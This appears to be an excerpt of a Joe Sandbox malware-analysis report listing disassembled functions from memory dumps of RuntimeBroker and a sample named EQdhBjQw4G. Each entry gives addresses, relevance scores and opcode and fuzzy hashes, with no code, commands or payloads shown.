                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9b391616099f6d3fff0b7ec4eb00f564c313c61daa9f2895fc93ec336df0d011
                                                                      • Instruction ID: c688b0b9506d7e80dba1e2c702f3924708bc2e8db8a258bcfd3d8e2578293938
                                                                      • Opcode Fuzzy Hash: 9b391616099f6d3fff0b7ec4eb00f564c313c61daa9f2895fc93ec336df0d011
                                                                      • Instruction Fuzzy Hash: 4FF02230518A1C8FCF98DB48C495EE9B7F1FB68305F154599914AE72A0CB31AA80CF85
                                                                      Function 00007FFD9B8CD459 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ba736035fa633c8ca825ff0cf86fb36d06e0121df7aab2ba7dc9bf295e1baaf4
                                                                      • Instruction ID: 7d77ad6cb2987bc77775083f8f66ba844faddb3fd44bbf9729ae6690ead2ed18
                                                                      • Opcode Fuzzy Hash: ba736035fa633c8ca825ff0cf86fb36d06e0121df7aab2ba7dc9bf295e1baaf4
                                                                      • Instruction Fuzzy Hash: EBE08C2164A7804FC30E66389CA98543BB1DFAB21278A41DBC041CB6B3EA2ECC89C741
                                                                      Function 00007FFD9B8A4622 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c0186bf66b95d362cb25a69d1c9eaecfc839f880f9ecefc7387d894ca53d3705
                                                                      • Instruction ID: 7ceed153ac2f168313dbd501c589e6f9ddc9fd4547ae7362bfcf7f6e491dd0a7
                                                                      • Opcode Fuzzy Hash: c0186bf66b95d362cb25a69d1c9eaecfc839f880f9ecefc7387d894ca53d3705
                                                                      • Instruction Fuzzy Hash: E8E04F3270D80F96FB75A750C8705BB3692EBD8719B264239C02AD25A1DE6CA7068641
                                                                      Function 00007FFD9B892AD5 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                      • Instruction ID: 9f57dabdae326f99f93587561800b524ac45c405cfcda306ebea8823e06024e6
                                                                      • Opcode Fuzzy Hash: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                      • Instruction Fuzzy Hash: 35E01271F0D11A56FFA4A794D8617F966A0DB58300F1110B8D50ED33D1CD38AF418645
                                                                      Function 00007FFD9B8B91A9 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8b3000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3c89a02c4191a3142e1c0e985e323deac79fb3db9ccaa47c497b739200f758cd
                                                                      • Instruction ID: 8b8c34f85137e0868dbb20e6eb0981472966af9f90bf3b0b39ec1eae5bb0345f
                                                                      • Opcode Fuzzy Hash: 3c89a02c4191a3142e1c0e985e323deac79fb3db9ccaa47c497b739200f758cd
                                                                      • Instruction Fuzzy Hash: 71E0127054F3C04FCB0AAB7488698543FB0AE6B21078F41EEC08ACF1B3E62D8949C701
                                                                      Function 00007FFD9B8CA050 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Function 00007FFD9B8CA0E0 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Function 00007FFD9B8A3B30 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                      • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                      • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                      • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                      Function 00007FFD9B8C7489 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9eec8148cdc11d20ca6e4a29fc37742d57f5518ec323d69221f0075981819f0b
                                                                      • Instruction ID: ebb476e041869fb9b3c971ffe5d6da40b05989d01fad73e43c37698f59567be2
                                                                      • Opcode Fuzzy Hash: 9eec8148cdc11d20ca6e4a29fc37742d57f5518ec323d69221f0075981819f0b
                                                                      • Instruction Fuzzy Hash: 76E01A6594E7C04FC70B9B3488B88547F60DE1721074A40EBC085CF2B3E5298949C711
                                                                      Function 00007FFD9B8CD4D9 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c12b24600996daff528c562a0a9ca3c030329e078465264730dea7850f23641e
                                                                      • Instruction ID: 0946180e54041b516ca7189a9017140664d13340f92fc9f56fb5c6a05218d10d
                                                                      • Opcode Fuzzy Hash: c12b24600996daff528c562a0a9ca3c030329e078465264730dea7850f23641e
                                                                      • Instruction Fuzzy Hash: A9E04F6194F7C04FC71BA73488788507FA0DE5721078A40EFC185CF5B3D5199849C712
                                                                      Function 00007FFD9B8CC7A9 Relevance: .0, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c8262d4a635fcdd9bd911250cd8432f4b751a528c8bcc8fa1772dcca1dfffdf9
                                                                      • Instruction ID: 012b1e8b9fceebd5ed2ad95eded0d7c9b0ee91a15502e2fb83c325f1afe833f3
                                                                      • Opcode Fuzzy Hash: c8262d4a635fcdd9bd911250cd8432f4b751a528c8bcc8fa1772dcca1dfffdf9
                                                                      • Instruction Fuzzy Hash: 2BE0173154A7C84FC30AAB749CB99543FB0EEAB21178B01D7D045CB6B3EA1E8D88C752
                                                                      Function 00007FFD9B8C8AF9 Relevance: .0, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 226fc8267aa11a770ddfa93aeebf5c346e660c4dea33991971a3f12b2e385b46
                                                                      • Instruction ID: 50a7127e8c417f4566172e8b9dbf396791b88f84637248cb58d4e2abd7bd6aad
                                                                      • Opcode Fuzzy Hash: 226fc8267aa11a770ddfa93aeebf5c346e660c4dea33991971a3f12b2e385b46
                                                                      • Instruction Fuzzy Hash: A6E0C23054A7C44FC30AA7648C788403FB1EE6B21178B40CBC005CF5B3EA0D8C48C742
                                                                      Function 00007FFD9B8C1C90 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                      Function 00007FFD9B8C3C80 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                      Function 00007FFD9B8CB388 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                      • Instruction ID: 43c17ab8deacb7067e5d0d38499529c0938a085f3d5cd66090e169f11640904d
                                                                      • Opcode Fuzzy Hash: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                      • Instruction Fuzzy Hash: 56D01234B559044FC71CB739885987473A1EB6E21779640A9D00ACB2B1D96AED89C781
                                                                      Function 00007FFD9B8C6A90 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                      • Instruction ID: b1a987d9646deeebcc95fb385dab26c671575aa57d32c955645e03adb8f13550
                                                                      • Opcode Fuzzy Hash: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                      • Instruction Fuzzy Hash: 7DD02234B548040FC70CBB3888588303390EB6E2277C140A9D00AC72B1E92ADC88C740
                                                                      Function 00007FFD9B8906A5 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6893c421d8ec3c24c2459ab3e7736549536c1dc703aebdbdcaee714463a39ecf
                                                                      • Instruction ID: a1592d64f44aef6646087a3d6f4792349c7178ea0843b085b4c9772da485db98
                                                                      • Opcode Fuzzy Hash: 6893c421d8ec3c24c2459ab3e7736549536c1dc703aebdbdcaee714463a39ecf
                                                                      • Instruction Fuzzy Hash: 45C04C06F6B61F01FC3677EF98660ACA9405FDDE10FD70172D54D400E19D4D22D54156
                                                                      Function 00007FFD9B890B18 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a8faffb6d7c173064e94cb45fe907dacfd8786a3a2eae6cb9d4298120f12918
                                                                      • Instruction ID: 9e367327750c0d45ccf545ba014d1e26a92ed4a7658237128fca792b0164cc12
                                                                      • Opcode Fuzzy Hash: 2a8faffb6d7c173064e94cb45fe907dacfd8786a3a2eae6cb9d4298120f12918
                                                                      • Instruction Fuzzy Hash: 9FC08C305258088FC904E72DC98480076E0FB0D210BC20090E00EC7170E21A9C90C708
                                                                      Function 00007FFD9B891310 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                      • Instruction ID: 45700d14890448792f7a77ee4ad80256f46f31d6e75c6f2da8f924a925832783
                                                                      • Opcode Fuzzy Hash: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                      • Instruction Fuzzy Hash: F4C04C3455180D9FC958EB69C89591477A0FB1D315BD60090E409C7271E669DDD6C741
                                                                      Function 00007FFD9B894E17 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                      • Instruction ID: 76bd946553c2ef4ebd4a948394b85e23847e7e7cada1b332635ab29511e26127
                                                                      • Opcode Fuzzy Hash: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                      • Instruction Fuzzy Hash: 61C08CA1E2C20A95EB2496A048291AAB7818F09220F52867280ADA60A5DE2856025280
                                                                      Function 00007FFD9B892555 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5ae93d81f86d9c1a54e6c169ffc46933c29c7555cd0367baf935c6f3c1a66df3
                                                                      • Instruction ID: d53291d17d866c769872d96b37db5dc7a4268b2c330e950b100d9eb8ab25b8ef
                                                                      • Opcode Fuzzy Hash: 5ae93d81f86d9c1a54e6c169ffc46933c29c7555cd0367baf935c6f3c1a66df3
                                                                      • Instruction Fuzzy Hash: BAC08C04F0881A02F359320404301BE48828B44344F8004B4E00DC3ACECE0C9A2202C3
                                                                      Function 00007FFD9B8A685C Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 930dd795de9fa96c39b3a3dc93de49f779c1b9a10b594cbe09fb33c341a96781
                                                                      • Instruction ID: e66853bd5abbd316dd62931102c6f23c031e02e0e75b1562851458f6f8d88ce2
                                                                      • Opcode Fuzzy Hash: 930dd795de9fa96c39b3a3dc93de49f779c1b9a10b594cbe09fb33c341a96781
                                                                      • Instruction Fuzzy Hash: 6BD0C930D045298FEBA0DB548890BA8B2B1AF48300F5400F6800CE3295CA356DC0DB50
                                                                      Function 00007FFD9B8906C8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                      • Instruction ID: b3f92d2a2f5a77ba122d8cd4cd5a1a83409582608cc8b965e381d36b81ceda09
                                                                      • Opcode Fuzzy Hash: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                      • Instruction Fuzzy Hash: 0FB01200E6740F00EC2433FB08520A478405B4C500FC20070D80E40091984D22940242

                                                                      Executed Functions

                                                                      Function 00007FFD9B870D78 Relevance: .3, Instructions: 256COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.3154460202.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_7ffd9b870000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d7f940fdc8b22fe1a99e38d3623372fbeae3196b0b3a91de82810761ba73b50e
                                                                      • Instruction ID: d01836434d119d3546e41aaa8ed281290de8777312c32b23d38ea3f701daf772
                                                                      • Opcode Fuzzy Hash: d7f940fdc8b22fe1a99e38d3623372fbeae3196b0b3a91de82810761ba73b50e
                                                                      • Instruction Fuzzy Hash: 1891F371A1CA8D8FE799DF688869BA97FE0FF9A304F4001BAD149C72D6DB781415C740
                                                                      Function 00007FFD9B8708E8 Relevance: .1, Instructions: 133COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.3154460202.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_7ffd9b870000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 466770cdd2d857615ade315a8fd55c14789f5e32449460e6a3f54e8bcaa6459f
                                                                      • Instruction ID: 4700d2e06be7cf206ea7bdb44059ed72454caf88ce5e025e9f41383acb1a6c9e
                                                                      • Opcode Fuzzy Hash: 466770cdd2d857615ade315a8fd55c14789f5e32449460e6a3f54e8bcaa6459f
                                                                      • Instruction Fuzzy Hash: 4E31013130D9194FDB68EB5CE88A9B977D1EF8A32530541BBE48AC7176E911EC828781
                                                                      Function 00007FFD9B870998 Relevance: .1, Instructions: 100COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.3154460202.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_7ffd9b870000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30aa4e323f13ddcd6834073d215ceb0964a762fae410e1b5edbbd1c3c73e94a7
                                                                      • Instruction ID: a72d4f2cdaa31f81111c053ef44338efdb98583353eb6e563a737c2632a4d824
                                                                      • Opcode Fuzzy Hash: 30aa4e323f13ddcd6834073d215ceb0964a762fae410e1b5edbbd1c3c73e94a7
                                                                      • Instruction Fuzzy Hash: 43217D21B1DD1D0FE758AB6C54AAB7973C2EBCD325F0100B9E80DC32E7DC24AC414281
                                                                      Function 00007FFD9B87119D Relevance: .1, Instructions: 93COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.3154460202.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_7ffd9b870000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 241872cd3cb9b30047bea6edd0bea595e32705202d097566aaafc96917b54bff
                                                                      • Instruction ID: 9e20d3fca8cbed127c63cda060c321447353e3c63739bd943017a0681de7ddc6
                                                                      • Opcode Fuzzy Hash: 241872cd3cb9b30047bea6edd0bea595e32705202d097566aaafc96917b54bff
                                                                      • Instruction Fuzzy Hash: 1F31B431A1954E8FDF45EB68C8A9ABD7BF0FF69300F0505BAC009D76A2DE28A941C750
                                                                      Function 00007FFD9B870C25 Relevance: .1, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.3154460202.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_7ffd9b870000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1b914b433c2abc96927fba7cf458b2947003ea54dde62c573f5228485674c8f2
                                                                      • Instruction ID: 7a94c0ef465f9669cd734cba42790e2cd4e3c8eba1e36e9f38098de1aedf7f1a
                                                                      • Opcode Fuzzy Hash: 1b914b433c2abc96927fba7cf458b2947003ea54dde62c573f5228485674c8f2
                                                                      • Instruction Fuzzy Hash: 7E213A36B1D25D8FFB26E7A8ACA54DC7B60DF85328F0542B7D048CB1D3D9282647A390
                                                                      Function 00007FFD9B871B9F Relevance: .1, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.3154460202.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_7ffd9b870000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0143985d49b8d52ecc2d59939b7c815e68c9bedc9b1c30a406073268e6f31e32
                                                                      • Instruction ID: aa3aa41845ee36376cc0711d799c27d2b77f825a1f5787954c5d312ae16567d6
                                                                      • Opcode Fuzzy Hash: 0143985d49b8d52ecc2d59939b7c815e68c9bedc9b1c30a406073268e6f31e32
                                                                      • Instruction Fuzzy Hash: BB216721F1E90D4BEBB4F7A884A46782292EF9C715F4601B5D40DD75F2ED28AE419700
                                                                      Function 00007FFD9B870C40 Relevance: .1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.3154460202.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_7ffd9b870000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3aa92d50b369e8176e2be76740c80d17adde76a5b47a14288e5f597aaff28059
                                                                      • Instruction ID: db5b32c94899c0e1b16ca6c51060360863520b34f99ab5fdc4ac514c1a6526a4
                                                                      • Opcode Fuzzy Hash: 3aa92d50b369e8176e2be76740c80d17adde76a5b47a14288e5f597aaff28059
                                                                      • Instruction Fuzzy Hash: 0211E531E1E28D8FEB12DBA888A419C7FB0EF56718F0641F7D044DB1E2D53867459740
